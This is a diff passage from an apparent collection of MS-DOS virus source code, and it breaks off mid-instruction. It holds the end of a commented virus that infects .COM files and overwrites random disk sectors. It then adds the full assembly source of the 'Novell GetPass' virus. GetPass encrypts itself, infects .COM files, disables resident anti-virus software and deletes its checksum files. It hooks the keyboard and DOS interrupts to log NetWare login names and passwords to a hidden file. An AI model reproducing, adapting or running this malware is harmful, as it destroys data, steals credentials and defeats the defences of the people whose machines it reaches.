DISK. HAVE PHUN WITH THIS ONE. +; +; ALSO NOTE THAT THE COMMENTS IN (THESE) REPRESENT DESCRIPTION FOR THE CODE +; IMMEDIATE ON THAT LINE. THE OTHER COMMENTS ARE FOR THE ENTIRE ;| GROUPING. +; +; THIS FILE IS FOR EDUCATIONAL PURPOSES ONLY. THE AUTHOR AND CPI WILL NOT BE +; HELD RESPONSIBLE FOR ANY ACTIONS DUE TO THE READER AFTER INTRODUCTION OF +; THIS VIRUS. ALSO, THE AUTHOR AND CPI DO NOT ENDORSE ANY KIND OF ILLEGAL OR +; ILLICIT ACTIVITY THROUGH THE RELEASE OF THIS FILE. +; +; DOCTOR DISSECTOR +; CPI ASSOCIATES +; +;============================================================================= + +MAIN: + NOP ;| Marker bytes that identify this program + NOP ;| as infected/a virus + NOP ;| + + MOV AX,00 ;| Initialize the pointers + MOV ES:[POINTER],AX ;| + MOV ES:[COUNTER],AX ;| + MOV ES:[DISKS B],AL ;| + + MOV AH,19 ;| Get the selected drive (dir?) + INT 21 ;| + + MOV CS:DRIVE,AL ;| Get current path (save drive) + MOV AH,47 ;| (dir?) + MOV DH,0 ;| + ADD AL,1 ;| + MOV DL,AL ;| (in actual drive) + LEA SI,CS:OLD_PATH ;| + INT 21 ;| + + MOV AH,0E ;| Find # of drives + MOV DL,0 ;| + INT 21 ;| + CMP AL,01 ;| (Check if only one drive) + JNZ HUPS3 ;| (If not one drive, go the HUPS3) + MOV AL,06 ;| Set pointer to SEARCH_ORDER +6 (one drive) + + HUPS3: MOV AH,0 ;| Execute this if there is more than 1 drive + LEA BX,SEARCH_ORDER ;| + ADD BX,AX ;| + ADD BX,0001 ;| + MOV CS:POINTER,BX ;| + CLC ;| + +CHANGE_DISK: ;| Carry is set if no more .COM files are + JNC NO_NAME_CHANGE ;| found. From here, .EXE files will be + MOV AH,17 ;| renamed to .COM (change .EXE to .COM) + LEA DX,CS:MASKE_EXE ;| but will cause the error message Program + INT 21 ;| to large to fit in memory when starting + CMP AL,0FF ;| larger infected programs + JNZ NO_NAME_CHANGE ;| (Check if an .EXE is found) + + MOV AH,2CH ;| If neither .COM or .EXE files can be found, + INT 21 ;| then random sectors on the disk will be + MOV BX,CS:POINTER ;| overwritten depending on the system time + MOV AL,CS:[BX] ;| in milliseconds. This is the time of the + MOV BX,DX ;| complete infection of a storage medium. + MOV CX,2 ;| The virus can find nothing more to infect + MOV DH,0 ;| starts its destruction. + INT 26 ;| (write crap on disk) + +NO_NAME_CHANGE: ;| Check if the end of the search order table + MOV BX,CS:POINTER ;| has been reached. If so, end. + DEC BX ;| + MOV CS:POINTER,BX ;| + MOV DL,CS:[BX] ;| + CMP DL,0FF ;| + JNZ HUPS2 ;| + JMP HOPS ;| + +HUPS2: ;| Get a new drive from the search order table + MOV AH,0E ;| and select it, beginning with the ROOT dir. + INT 21 ;| (change drive) + MOV AH,3B ;| (change path) + LEA DX,PATH ;| + INT 21 ;| + JMP FIND_FIRST_FILE ;| + +FIND_FIRST_SUBDIR: ;| Starting from the root, search for the + MOV AH,17 ;| first subdir. First, (change .exe to .com) + LEA DX,CS:MASKE_EXE ;| convert all .EXE files to .COM in the + INT 21 ;| old directory. + MOV AH,3B ;| (use root directory) + LEA DX,PATH ;| + INT 21 ;| + MOV AH,04E ;| (search for first subdirectory) + MOV CX,00010001B ;| (dir mask) + LEA DX,MASKE_DIR ;| + INT 21 ;| + JC CHANGE_DISK ;| + MOV BX,CS:COUNTER ;| + INC BX ;| + DEC BX ;| + JZ USE_NEXT_SUBDIR ;| + +FIND_NEXT_SUBDIR: ;| Search for the next sub-dir, if no more + MOV AH,4FH ;| are found, the (search for next subdir) + INT 21 ;| drive will be changed. + JC CHANGE_DISK ;| + DEC BX ;| + JNZ FIND_NEXT_SUBDIR ;| + +USE_NEXT_SUBDIR: + MOV AH,2FH ;| Select found directory. (get dta address) + INT 21 ;| + ADD BX,1CH ;| + MOV ES:[BX],W\ ;| (address of name in dta) + INC BX ;| + PUSH DS ;| + MOV AX,ES ;| + MOV DS,AX ;| + MOV DX,BX ;| + MOV AH,3B ;| (change path) + INT 21 ;| + POP DS ;| + MOV BX,CS:COUNTER ;| + INC BX ;| + MOV CS:COUNTER,BX ;| + +FIND_FIRST_FILE: ;| Find first .COM file in the current dir. + MOV AH,04E ;| If there are none, (Search for first) + MOV CX,00000001B ;| search the next directory. (mask) + LEA DX,MASKE_COM ;| + INT 21 ;| + JC FIND_FIRST_SUBDIR ;| + JMP CHECK_IF_ILL ;| + +FIND_NEXT_FILE: ;| If program is ill (infected) then search + MOV AH,4FH ;| for another. (search for next) + INT 21 ;| + JC FIND_FIRST_SUBDIR ;| + +CHECK_IF_ILL: ;| Check if already infected by virus. + MOV AH,3D ;| (open channel) + MOV AL,02 ;| (read/write) + MOV DX,9EH ;| (address of name in dta) + INT 21 ;| + MOV BX,AX ;| (save channel) + MOV AH,3FH ;| (read file) + MOV CH,BUFLEN ;| + MOV DX,BUFFER ;| (write in buffer) + INT 21 ;| + MOV AH,3EH ;| (close file) + INT 21 ;| + MOV BX,CS:[BUFFER] ;| (look for three NOPs) + CMP BX,9090 ;| + JZ FIND_NEXT_FILE ;| + + MOV AH,43 ;| This section by-passes (write enable) + MOV AL,0 ;| the MS/PC DOS Write Protection. + MOV DX,9EH ;| (address of name in dta) + INT 21 ;| + MOV AH,43 ;| + MOV AL,01 ;| + AND CX,11111110B ;| + INT 21 ;| + + MOV AH,3D ;| Open file for read/write (open channel) + MOV AL,02 ;| access (read/write) + MOV DX,9EH ;| (address of name in dta) + INT 21 ;| + + MOV BX,AX ;| Read date entry of program and (channel) + MOV AH,57 ;| save for future use. (get date) + MOV AL,0 ;| + INT 21 ;| + PUSH CX ;| (save date) + PUSH DX ;| + + MOV DX,CS:[CONTA W] ;| The jump located at 0100h (save old jmp) + MOV CS:[JMPBUF],DX ;| the program will be saved for future use. + MOV DX,CS:[BUFFER+1] ;| (save new jump) + LEA CX,CONT-100 ;| + SUB DX,CX ;| + MOV CS:[CONTA],DX ;| + + MOV AH,57 ;| The virus now copies itself to (write date) + MOV AL,1 ;| to the start of the file. + POP DX ;| + POP CX ;| (restore date) + INT 21 ;| + MOV AH,3EH ;| (close file) + INT 21 ;| + + MOV DX,CS:[JMPBUF] ;| Restore the old jump address. The virus + MOV CS:[CONTA],DX ;| at address CONTA the jump which was at the + ;| start of the program. This is done to +HOPS: ;| preserve the executability of the host + NOP ;| program as much as possible. After saving, + CALL USE_OLD ;| it still works with the jump address in the + ;| virus. The jump address in the virus differs + ;| from the jump address in memory + +CONT DB 0E9 ;| Continue with the host program (make jump) +CONTA DW 0 ;| + MOV AH,00 ;| + INT 21 ;| + +USE_OLD: + MOV AH,0E ;| Reactivate the selected (use old drive) + MOV DL,CS:DRIVE ;| drive at the start of the program, and + INT 21 ;| reactivate the selected path at the start + MOV AH,3B ;| of the program.(use old drive) + LEA DX,OLD_PATH-1 ;| (get old path and backslash) + INT 21 ;| + RET ;| + +SEARCH_ORDER DB 0FF,1,0,2,3,0FF,00,0FF + +POINTER DW 0000 ;| (pointer f. search order) +COUNTER DW 0000 ;| (counter f. nth. search) +DISKS DB 0 ;| (number of disks) +MASKE_COM DB *.COM,00 ;| (search for com files) +MASKE_DIR DB *,00 ;| (search for dirs) +MASKE_EXE DB 0FF,0,0,0,0,0,00111111XB + DB 0,????????EXE,0,0,0,0 + DB 0,????????COM,0 +MASKE_ALL DB 0FF,0,0,0,0,0,00111111XB + DB 0,???????????,0,0,0,0 + DB 0,????????COM,0 + +BUFFER EQU 0E00 ;| (a safe place) + +BUFLEN EQU 208H ;| Length of virus. Modify this accordingly + ;| if you modify this source. Be careful + ;| for this may change! + +JMPBUF EQU BUFFER+BUFLEN ;| (a safe place for jmp) + +PATH DB \,0 ;| (first place) +DRIVE DB 0 ;| (actual drive) +BACK_SLASH DB \ +OLD_PATH DB 32 DUP (?) ;| (old path) + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.getpass!.asm b/MSDOS/Virus.MSDOS.Unknown.getpass!.asm new file mode 100644 index 00000000..c1b7367c --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.getpass!.asm @@ -0,0 +1,785 @@ +;============================================================================= +; Please feel free to distribute, but do NOT change and say it's your's! +;============================================================================= +; You are now looking at the source code of the Novell GetPass virus! +; Stop doing so! But if you don't well, ok! The GetPass virus is fairly +; unique in some parts of it's behaviour. It infects *.COM files using +; an infection interrupt routine.(INT D0) It first renames the files +; it infects to a *.TXT file to avoid heuristic alarms of some rule +; based TSR's and then restores the original extention. Some resident +; anti-viral products will be completely disabled in memory and their +; CRC check files will be deleted. The GetPass routine will become +; resident if the virus detects that NETX (Novell NetWare) is loaded +; in memory, hooking INT 16 (keyboard) and INT 21 in memory. +; The GetPass routine activates when LOGIN is executed. The users login +; name and his/her password will be captured and written to a file wich +; will be created in C:\DOS.(the file is MSD.INI) If the file becomes +; approximatly 8Kb, the virus deletes the file. This to avoid a very large +; file in the DOS directory. A new file will be created and the logging +; will continue. Every first day of the month, when an infected program +; is executed the file containing the names/passwords is printed if there +; is a printer available. The virus does not infect COMMAND.COM. +; +; Greetings ,ThE wEiRd GeNiUs +; +; PS: Check your MSD.INI file once in a while! +;----------------------------------------------------------------------------- +; Assemble with TASM 2.0 or higher, Link with TLINK /T +;----------------------------------------------------------------------------- + CODE SEGMENT + ASSUME CS:CODE,DS:CODE,ES:CODE,SS:CODE + + CRYPTLEN EQU CHKTIME-CSTART-1;Length to en/decrypt. + VIRLEN EQU BUFFER-VSTART ;Length of virus. + MINLEN EQU 1000 ;Min file length to infect. + MAXLEN EQU 0F230h ;Max " " " " + CR EQU 0Dh ;Return. + LF EQU 0Ah ;Line feed. + TAB EQU 09h ;Tab. + INTRO EQU LBIT-INAME ; + TSRLEN EQU LASTBYT-TSR ;Length of activation TSR. + TSR2LEN EQU NOTENC-INFECT+1;Length of infection Interrupt. + LENGTH EQU VAL_1-CSTART ;Length of encrypted code. + KBUFF EQU KEYBUFF-TSR ;\ + KPTR EQU KEYPTR-TSR ; + FN EQU FNAME-TSR ; + LOGINL EQU LOGIN-TSR ; + KFLAG EQU KBFLAG-TSR ; Offsets in activation TSR. + INTOF EQU INT21-TSR ; + INT16L EQU INT16-TSR ; + OLD16L EQU NINT16-TSR ; + NINTOF EQU NINT21-TSR ; + COUCR EQU CCOUNT-TSR ; + PARLEN EQU PARAM-TSR ;/ + + ORG 0100h + + .RADIX 16 +;----------------------------------------------------------------------------- +; Infected dummy program. (Only in 1st run) +;----------------------------------------------------------------------------- +START: JMP VSTART ;Jump to virus code. +;----------------------------------------------------------------------------- +; Begin of the virus code. +;----------------------------------------------------------------------------- +VSTART: CALL CHKDOS ;-Confuse anti-viral progs. + CALL CHKTIME ;/ +BEGIN: CALL ENCRYP ;Call decryption routine. +;----------------------------------------------------------------------------- +; From here the code will be encrypted. +;----------------------------------------------------------------------------- +CSTART: CALL BEGIN1 ;Same old trick. + CALL RESBEG ;Restore begin. + CALL CHKDRV ;Check drive & DOS version. + CALL SAVEDIR ;Save startup directory. + PUSH ES ;In the next sessions ES is modified. + CALL INT24 ;NoErrorAllowed. + CALL VSAFE ;Vsafe resident? + CALL ACTIVE ;Install password routine. + POP ES ;Restore extra segment. + CALL ENKEY ;Create new CRYPTKEY. + CALL INSTSR2 ;Place infection routine in memory. + CALL DTA ;Store old and give up new DTA addres. + CALL FIND1 ;Determine how many path's are present. + CALL RANDOM ;Random value for directory search. + CALL FIND2 ;Find suitable directory. + CALL CHDRIVE ;If it is on another drive. + CALL GODIR ;Go to the selected directory. +F_FIRST:MOV AH,4Eh ;Search for 1st *.COM + MOV CX,110b ;Look for read only, system & hidden. + LEA DX,[BP+OFFSET SPEC] ;Offset file specification.(*.COM) + INT 21h ;Call DOS. + JNC OPENF ;Exit if no file found. + CALL EXIT1 ;No files found, quit. +OPENF: CALL CHKCOM ;-Is it COMMAND.COM? + CMP CX,00h ;/ + JE LETSGO ;Yes, do NOT infect. + CALL CHKINF ;Already infected? + CALL ATTRIB ;Ask & clear file attributes. + CALL RENAME ;Rename to *.TXT file. + MOV AH,4Eh ;Search the name.TXT file. + MOV CX,110b ;Read only, system & hidden. + LEA DX,[BP+OFFSET NEWNAM] ;Offset file specification.(name.TXT) + INT 21h ;Call DOS. + MOV AX,3D02h ;Open file with read and write access. + LEA DX,[BP+OFFSET NEWNAM] ;Offset file specification.(name.TXT) + INT 21h ;Call DOS. + MOV BYTE PTR[BP+OFFSET HANDLE],AL;Save file handle. + CALL STIME ;Save file date & time. +CHECK: MOV AH,3Fh ;Read begin of victim. + MOV CX,3 ;Read Begin. + LEA DX,[BP+OFFSET ORIGNL] ;Into offset original instructions. + INT 21h ;Call DOS. + JC CLOSE ;On error, quit. +REPLACE:CALL BPOINT ;Move file pointer to end of victim. + SUB AX,3 ;Calculate new jump. + MOV WORD PTR[BP+NEWJMP+1],AX;Store new jump value. + MOV AX,4200h ;Move file pointer to begin. + XOR CX,CX ;Zero high nybble. + XOR DX,DX ;Zero low nybble. + INT 21h ;Call DOS. + MOV AH,40h ;Write to file, + MOV CX,3 ;3 Bytes. + LEA DX,[BP+OFFSET NEWJMP] ;Offset new jump value. + INT 21h ;Call DOS. + CALL BPOINT ;Move file pointer to end. + JMP INFEC ;Create encryption key. +LETSGO: MOV AH,4Fh ;Find next. + INT 21h ;Call DOS. + JC EXIT ;On error, quit. + JMP OPENF ;Open new victim. +INFEC: MOV DL,[BP+OFFSET VAL_1] ;Encryption value into DL. + INT 0D0h ;Neat way to infect a file! +CLOSE: CALL RTIME ;Restore File time & date. + MOV AH,3Eh ;Close file. + INT 21h ;Call DOS. + CALL RENAME2 ;Restore back to COM file. + CALL RATTRIB ;Restore File attributes. +;----------------------------------------------------------------------------- +EXIT: CALL DELSTUF ;Delete CRC checkers. +EXIT1: MOV AH,1Ah ;Restore old DTA. + MOV DX,[BP+OFFSET OLD_DTA] ;Old DTA address. + INT 21h ;Call DOS. +EXIT2: MOV AH,0Eh ;Restore startup drive. + MOV DL,BYTE PTR[BP+OFFSET OLDRV];Old drive code. + INT 21h ;Call DOS. + MOV AH,3Bh ;Goto startup directory, + LEA DX,[BP+OFFSET BUFFER] ;that is stored here. + INT 21h ;Call DOS. +EXIT3: CALL RINT24 ;Restore original INT 24 +EXIT4: MOV AX,100h ; + PUSH AX ; + RET ;Pass control to HOST. +;----------------------------------------------------------------------------- +DUMEX: MOV DI,0100h ;This is a dummy exit, it screws up + LEA SI,[BP+DEXIT] ;TbClean. In stead of cleaning the + MOV CX,3 ;phile, it puts a program terminating + REPNZ MOVSB ;interrupt in the beginning of the + MOV AX,0100h ;victim, neat huh! + PUSH AX ; + RET ; +;----------------------------------------------------------------------------- +BETWEEN:MOV AH,3Eh ;Close the file. + INT 21h ;Call DOS + JMP LETSGO ;Find next file. +CHKINF: MOV AX,3D00h ;Open file with only read acces. + MOV DX,WORD PTR[BP+OFFSET NP];Offset filename. + INT 21h ;Call DOS. + MOV BX,AX ;File handle into BX. + MOV CX,0FFFFh ;- Move -3 into CX,DX. + MOV DX,0FFFCh ;/ + MOV AX,4202h ;Move file pointer to end-3 + INT 21h ;Call DOS. + MOV AH,3Fh ;Read file. + MOV CX,01h ;One Byte. + LEA DX,[BP+OFFSET MARK1] ;Into this address. + INT 21h ;Call DOS. + CMP BYTE PTR [BP+OFFSET MARK1],43h; Is it infected? + JE BETWEEN ;Yes, find another. + CALL BPOINT ;Go to EOF. + CMP AX,MAXLEN ;Is the file to long? + JNB BETWEEN ;Yes, find another. + CMP AX,MINLEN ;Is it to short? + JBE BETWEEN ;Yes, find another. + MOV AH,3Eh ;Close the file. + INT 21h ;Call DOS + RET ;Return to caller. +;----------------------------------------------------------------------------- +CHKDRV: CALL CHKDOS ;Check DOS version. + CMP AL,01 ; + JB DUMEX ;Screw up TbClean. + CMP AL,05h ;Is it DOS 5.0 or higher? + JNGE EXIT4 ;No, exit. + MOV AH,19h ;Get drive code. + INT 21h ;Call DOS. + MOV BYTE PTR[BP+OFFSET OLDRV],AL;Save old drive code. + RET ;Return to caller. +;----------------------------------------------------------------------------- +RESBEG: LEA SI,[BP+OFFSET ORIGNL] ;Offset original begin. + MOV DI,0100h ;Restore original instructions. + MOV CX,3 ;Restore 3 bytes. + REPNZ MOVSB ;Move them. + RET ;Return to caller. +;----------------------------------------------------------------------------- +CHKCOM: MOV CX,05 ;CX=len COMMAND. + MOV DI,[BP+OFFSET NP] ;Offset found file. + LEA SI,[BP+OFFSET COMMND] ;Offset COMMAND. + REPZ CMPSB ;Compare the strings. + RET ;Return to caller. +;----------------------------------------------------------------------------- +RENAME: MOV CX,0Ch ; This section renames the + MOV SI,WORD PTR[BP+OFFSET NP]; found and approved for + LEA DI,WORD PTR[BP+OFFSET NEWNAM]; infection file to a + REPNZ MOVSB ; *.TXT file. The reason for + LEA BX,WORD PTR[BP+OFFSET NEWNAM-1];this is that VPROTECT from +LPOINT: INC BX ; Intel has a rule based NLM. + CMP BYTE PTR[BX],'.' ; If we write to a COM file + JNE LPOINT ; VPROTECT gives an alarm + MOV DI,BX ; message. However, if we + MOV WORD PTR[BP+OFFSET TXTPOI],BX; write to a text file.... + LEA SI,[BP+OFFSET TXT] ; Pretty solution isn't it? + MOVSW ; + MOVSW ; + MOV DX,WORD PTR[BP+OFFSET NP]; + LEA DI,WORD PTR[BP+OFFSET NEWNAM]; + MOV AH,56h ;Rename file function. + INT 21h ;Call DOS. + RET ;Return to caller. +;----------------------------------------------------------------------------- +RENAME2:LEA SI,[BP+OFFSET SPEC+1] ; In this section we + MOV DI,WORD PTR[BP+OFFSET TXTPOI]; give the infected file + MOVSW ; its old extention back. + MOVSW ; (*.COM) + MOV DX,WORD PTR[BP+OFFSET NP]; + LEA DI,WORD PTR[BP+OFFSET NEWNAM]; + MOV AH,56h ;Rename file function. + INT 21h ;Call DOS. + RET ;Return to caller. +;----------------------------------------------------------------------------- +ENKEY: CALL CHKTIME ;Get time. + MOV BYTE PTR[BP+OFFSET VAL_1],DL;New encryption key. + RET ;Return to caller. +;----------------------------------------------------------------------------- +SAVEDIR:MOV BYTE PTR[BP+OFFSET BUFFER],5Ch;Put a slash in DTA. + MOV DL,BYTE PTR[BP+OFFSET OLDRV];Drive code. + INC DL ;DL+1 because functions differ. + MOV AH,47h ;Get current directory. + LEA SI,[BP+OFFSET BUFFER+1] ;Store current directory. + INT 21h ;Call DOS. + RET ;Return to caller. +;----------------------------------------------------------------------------- +DTA: MOV AH,2Fh ;Get DTA address. + INT 21h ;Call DOS. + MOV WORD PTR[BP+OFFSET OLD_DTA],BX; Save here. + LEA DX,[BP+OFFSET NEW_DTA] ;Offset new DTA address. + MOV AH,1Ah ;Give up new DTA. + INT 21 ;Call DOS. + ADD DX,1Eh ;Filename pointer in DTA. + MOV WORD PTR[BP+OFFSET NP],DX;Put in name pointer. + RET ;Return to caller. +;----------------------------------------------------------------------------- +INT24: MOV AX,3524h ;Get int 24 handler. + INT 21h ;into [ES:BX]. + MOV WORD PTR[BP+OLDINT],BX ;Save it. + MOV WORD PTR[BP+OLDINT+2],ES; + MOV AH,25h ;Set new int 24 handler. + LEA DX,[BP+OFFSET NEWINT] ;DS:DX->new handler. + INT 21h ;Call DOS. + RET ;Return to caller. +;----------------------------------------------------------------------------- +RINT24: PUSH DS ;Save data segment. + MOV AX,2524h ;Restore int 24 handler + LDS DX,[BP+OFFSET OLDINT] ;to original. + INT 21h ;Call DOS. + POP DS ;Restore data segment. + RET ;Return to caller. +;----------------------------------------------------------------------------- +VSAFE: MOV AX,3516h ;Get interrupt vector INT 16. + INT 21h ;(Now we know in wich segment it is.) + MOV WORD PTR[BP+OFFSET NINT16],BX; - Store old INT 16 in TSR. + MOV WORD PTR[BP+OFFSET NINT16+2],ES;/ + ADD BX,0364h ;Here we find a jump that w'ill change. + CMP WORD PTR[ES:BX],0945h ;Is it THE jump? + JNE OK_9 ;No, already modified or not resident. + MOV WORD PTR[ES:BX],086Dh ;Yes, modify it. +OK_9: RET ;Return to caller. No Vsafe. +;----------------------------------------------------------------------------- +FIND1: MOV BYTE PTR[BP+OFFSET VAL_2],0FFh; This routine is derivied from + MOV BX,01h ; the VIENNA virus. +FIND2: PUSH ES ;- Save registers. + PUSH DS ;/ + MOV ES,DS:2CH ; + MOV DI,0 ;ES:DI points to environment. +FPATH: LEA SI,[BP+OFFSET PATH] ;Point to "PATH=" string in data area. + LODSB ; + MOV CX,OFFSET 8000H ;Environment can be 32768 bytes long. + REPNZ SCASB ;Search for first character. + MOV CX,4 ;Check if path +LOOP_2: LODSB ;is complete. + SCASB ; + JNZ FPATH ;If not all there, abort & start over. + LOOP LOOP_2 ;Loop to check the next character. + XCHG SI,DI ;Exchange registers. + MOV CL,BYTE PTR[BP+OFFSET VAL_2];Random value in CL. + PUSH ES ;\ + POP DS ;-) Get DS, ES on address. + POP ES ;/ +OK_14: LEA DI,[BP+OFFSET NEW_DTA+50];Offset address path. +OK_10: MOVSB ;Get name in path. + MOV AL,[SI] ; + CMP AL,0 ;Is it at the end? + JE OK_11 ;Yes, replicate. + CMP AL,3Bh ;Is it ';'? + JNE OK_10 ;Nope, next letter. + INC SI ;For next loop. ';'=';'+1. + INC BX ; + LOOP OK_14 ;Loop until random value = 0. +OK_11: POP DS ;Restore data segment. + MOV AL,0 ;Place space after the directory. + MOV [DI],AL ; + RET ;Return to caller. +;----------------------------------------------------------------------------- +DELSTUF:MOV BX,01h ;Set counter + PUSH BX ;and push it. + LEA DX,[BP+OFFSET MICRO] ;Is there a CHKLIST.MS file? + JMP INTER ;Check it out. +SECOND: LEA DX,[BP+OFFSET TBAV] ;Is there a ANTI-VIR.DAT file? + INC BX ;Increase counter + PUSH BX ;and push it. + JMP INTER ;Check it out. +THIRD: LEA DX,[BP+OFFSET CENTRAL] ;Is there a CHKLIST.CPS file? + INC BX ;Increase counter + PUSH BX ;and push it +INTER: MOV AH,4Eh ;Find first matching entry. + MOV CX,110b ;Search all attributes. + INT 21h ;Call DOS. + JC NODEL ;No match, find next. + CALL ATTRIB ;Clear attributes. + MOV AH,41h ;Delete file. + INT 21h ;Call DOS. +NODEL: POP BX ;Pop counter. + CMP BX,01 ;Had the first one? + JE SECOND ;Yes, do the second. + CMP BX,02 ;Was it the second? + JE THIRD ;Yes, do the third. + RET ;Finished, return to caller. +;----------------------------------------------------------------------------- +CHDRIVE:MOV CX,0FFFFh ;Clear CX. + MOV BL,'A'-1 ;AH=40 +OK_15: INC BL ;AH=41='A' + INC CX ;CX=1 + CMP BL,BYTE PTR[BP+OFFSET NEW_DTA+50];New drive letter. + JNE OK_15 ;Not the same, go again. + MOV DL,CL ;Calculated the new drive code. + MOV AH,0Eh ;Give up new drive code. + INT 21h ;Call DOS. + RET ;Return to caller. +;----------------------------------------------------------------------------- +RTIME: MOV AX,5701h ;Restore time & date. + MOV CX,WORD PTR[BP+OFFSET TIME];Old time. + MOV DX,WORD PTR[BP+OFFSET DATE];Old date. + INT 21h ;Call DOS. + RET ;Return to caller. +;----------------------------------------------------------------------------- +STIME: MOV AX,5700h ;Get file date & time. + MOV BX,[BP+OFFSET HANDLE] ;File Handle. + INT 21h ;Call DOS. + MOV WORD PTR[BP+OFFSET TIME],CX;Store time. + MOV WORD PTR[BP+OFFSET DATE],DX;Store date. + RET ;Return to caller. +;----------------------------------------------------------------------------- +BPOINT: XOR DX,DX ;Zero register. + MOV AX,4202h ;Move file pointer to top. + XOR CX,CX ;Zero register. + INT 21h ;Call DOS. + RET ;Return to caller. +;----------------------------------------------------------------------------- +ACTIVE: PUSH DS ;Save register. + INT 17h ;Check for NETX. + CMP AH,01h ;NETX resident? + JNE RESID ;Nope, do not install TSR. + CALL CREATE ;If not exsists, create password file. + CALL TIMER ;Time to print the password file? + MOV AX,3D3Dh ;Do resident check. + INT 21h ;Call BIOS. + CMP AX,1111h ;Already resident? + JE RESID ;If so, exit. + MOV AX,0044h ;Move code into hole in system + MOV ES,AX ;memory. + MOV DI,0100h ;ES:BX = 0044:0100 + LEA SI,[BP+OFFSET TSR] ;Begin here + MOV CX,TSRLEN ;and this many bytes. + REP MOVSB ;Do it. + MOV DS,CX ;Get original INT 21 vector + MOV SI,0084h ;DS:SI = 0000:0084 + MOV DI,0100h+NINTOF ;Store it in TSR + MOVSW ;One word, + MOVSW ;and another. + PUSH ES ;Restore register. + POP DS ;Restore register + MOV AX,2521h ;Give up new INT 21 vector. + MOV DX,0100h+INTOF ;Offset new INT 21. + INT 21h ;Call DOS. + MOV AX,2516h ;Give up new INT 16 vector. + MOV DX,0100h+INT16L ;Offset new INT 16. + INT 21h ;Call DOS. +RESID: POP DS ;- Restore register. + RET ;Return to caller. +;----------------------------------------------------------------------------- +TSR: DB 0 ; This is THE cool part! +;----------------------------------------------------------------------------- +INT21: CMP AX,4B00h ;Execute? + JE OK_16 ;Yep, do IT ! + CMP AX,3D3Dh ;Resident check? + JNE DO_OLDI ;Nope, do original INT 21. + MOV AX,1111h ;Give up resident FLAG. + IRET ;Return to viral code. +DO_OLDI:JMP DWORD PTR CS:[0100+NINTOF];Do the original INT 21. +OK_16: PUSH BX ;\ + PUSH CX ; \ + PUSH DX ; ) Save registers. + PUSH DS ; / + PUSH ES ;/ + MOV SI,0 ; + MOV BX,DX ;Name pointer into BX. +HERE: CMP BYTE PTR[BX],'.' ;Is it a point? + JE FOLLOW ;Yes, collected the name, cont. + INC BX ;BX+1 + JMP HERE ;Get next character. +FOLLOW: SUB BX,05h ;Because LOGIN is 5 characters. +THERE: MOV AL,BYTE PTR [CS:0100+LOGINL+SI];Char into AL. + CMP BYTE PTR[BX+SI],'.' ;Did we make it until the point? + JE GETPASS ;It is LOGIN, get the password! + XOR AL,DS:[BX+SI] ;(XOR LOGIN,LOGIN) + JZ FOLLOW1 ;If XOR = 0 we have an equal char. + JMP ISNOT ;If not, well execute and do nothing. +FOLLOW1:INC SI ;Next char. + JMP THERE ;And compare again. (we must be shure.) +ISNOT: JMP ENDPARS ;Return to caller. +LOGIN DB 'LOGIN',0 ;Used to compare. +KBFLAG DB 0 ;Keyboard interrupt activation flag. +FNAME DB 'C:\DOS\MSD.INI',0 ;Password file specification. +KEYPTR DW 0 ;Keyboard pointer. +CCOUNT DB 0 ;\ +CRETURN DB 0 ;/ Carriage return counter. +;----------------------------------------------------------------------------- +GETPASS:MOV BYTE PTR[CS:0100+KFLAG],0FFh;Set interrupt 16 flag. + POP ES ;\ + POP DS ; \ + POP DX ; ) Restore registers. + POP CX ; / + POP BX ;/ + PUSH BX ;\ + PUSH CX ; \ + PUSH DX ; ) Save registers. + PUSH DS ; / + PUSH ES ;/ + MOV DS,ES:[BX+04] ;\ Get param.pointer ES:SI + MOV SI,ES:[BX+02] ;/ + PUSH CS ; \ + POP ES ; ) Get keybuff pointer DS:DI + MOV DI,OFFSET[CS:0100+KBUFF]; / + XOR CX,CX ; + MOV CL,BYTE PTR DS:[SI] ;CX IS PARAM.LEN. + INC SI ; + INC SI ; + CMP CL,10h ; + JG ENDPARS ; + CMP CL,00h ;No parameters. + JE BRANCH ; + MOV BYTE PTR[CS:0100+COUCR],01h; +ENDFD: INC CX ; + MOV WORD PTR[CS:0100+KPTR],CX;Set keyb.index op len param. + DEC CX ; + REPNZ MOVSB ; + MOV BYTE PTR ES:[DI-1],CR ; + MOV BYTE PTR ES:[DI],LF ; + JMP ENDPARS ; +BRANCH: MOV BYTE PTR[CS:0100+COUCR],02h; +ENDPARS:POP ES ;\ + POP DS ; \ + POP DX ; ) Restore registers. + POP CX ; / + POP BX ;/ + MOV AX,4B00h ; + JMP DWORD PTR CS:[0100+NINTOF];Do the original INT 21. +PARAM DB 0 ; +;----------------------------------------------------------------------------- +INT16: CMP BYTE PTR[CS:0100+KFLAG],0FFh;Is it login.? + JE NEXTCHK ; Yes! Get the password! +THE_END:JMP DWORD PTR[CS:0100+OLD16L];Nope, do old INT 16. +NEXTCHK:CMP AH,00h ; Keyboard funtion call? + JE TAKCHAR ; Yes, continue. + CMP AH,10h ; Keyboard function call? + JNE THE_END ; +TAKCHAR:PUSHF ;Push flag register. + CALL DWORD PTR[CS:0100+OLD16L];Call old INT 16. + PUSH DS ;\ + PUSH CS ; \ + POP DS ; \ + PUSH AX ; ) Save regs and set DS + PUSH BX ; / + PUSH CX ; / + PUSH DX ;/ + CMP AL,00H ; No key typed + JE RESREGS ; + MOV BX,WORD PTR[CS:0100+KPTR]; Keybuf index + CMP BX,001Bh ; Max. length of kbuff. + JGE RESREGS ; End int16 + CMP AL,CR ; If key = + JE COUNTCR ; +BACK: MOV BYTE PTR[CS:0100+KBUFF+BX],AL; Copy char into KBuffer + INC BX ; + MOV WORD PTR[CS:0100+KPTR],BX; +RESREGS:POP DX ;\ + POP CX ; \ + POP BX ; ) Restore regs. + POP AX ; / + POP DS ;/ + IRET ; Return +COUNTCR:MOV AL,LF ;Line feed into AL. + DEC BYTE PTR[CS:0100+COUCR] ;Decrease CR counter. + CMP BYTE PTR[CS:0100+COUCR],00h;Is it zero? + JE OVER_2 ;Nope, continue logging. + MOV BYTE PTR[CS:0100+KBUFF+BX],CR; Copy char into KBuffer + INC BX ; + MOV WORD PTR[CS:0100+KPTR],BX; + MOV AL,LF ; + JMP BACK ; +OVER_2: MOV AL,CR ;CR into AL. + MOV BYTE PTR[CS:0100+KBUFF+BX],AL;Copy CR into KBuffer. + INC BX ;Increase buffercounter. + MOV BYTE PTR[CS:0100+KBUFF+BX],LF;Copy char into KBuffer. + INC BX ;Increase buffercounter. + MOV BYTE PTR[CS:0100+KBUFF+BX],LF;Copy char into KBuffer. + CALL WFILE ;Write buffer to the logfile. + MOV BYTE 